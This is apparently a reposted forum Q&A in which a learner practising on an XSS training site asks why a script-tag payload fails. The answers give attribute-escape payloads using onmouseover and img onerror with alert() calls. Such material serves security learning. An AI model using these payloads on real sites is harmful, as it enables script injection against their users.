I recently started to teach myself XSS vulnerability and stumbled this website for practice.
https://sudo.co.il/xss/level2.php
But after several attempts to enter several payloads
Example: <script>alert('XSS')</script>
I can't get XSS to work.
The value is reflected in the input value attribute. You can escape this by starting with a "
and then add other attributes. For example: " onmouseover="alert('XSS')"
.
To require less user interaction you can change the style: " onmouseover="alert('XSS')" style="width: 1000px; height: 1000px"
" onmouseover="alert('XSS')" style="width: 1000px; height: 1000px"
or there may be better attributes to use instead.
You can escape this by starting with a "
For example: "><img/src=x onerror=alert(origin)>
The technical post webpages of this site follow the CC BY-SA 4.0 protocol. If you need to reprint, please indicate the site URL or the original address.Any question please contact:yoyou2525@163.com.